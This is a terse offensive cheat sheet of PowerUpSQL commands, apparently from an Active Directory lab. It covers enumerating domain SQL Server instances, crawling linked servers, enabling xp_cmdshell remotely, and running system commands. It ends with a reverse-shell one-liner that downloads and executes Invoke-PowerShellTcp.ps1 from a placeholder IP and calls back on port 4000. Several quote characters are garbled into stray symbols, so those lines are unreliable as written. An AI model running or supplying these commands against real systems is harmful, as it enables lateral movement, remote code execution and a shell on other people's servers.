Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded β Verbose
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Search for links to remote servers
Get-SQLServerLink -Instance <sql instance> -Verbose
Get-SQLServerLinkCrawl -Instance <sql instance> -Verbose
Execute(βsp_configure βxp_cmdshellβ,1;reconfigure;β) AT β<sql instance>β
Get-SQLServerLinkCrawl -Instance <sql instance> -Query "exec master..xp_cmdshell 'whoami'"
Execute reverse shell example
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'Powershell.exe iex (iwr http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1 -UseBasicParsing);reverse -Reverse -IPAddress xx.xx.xx.xx -Port 4000'"
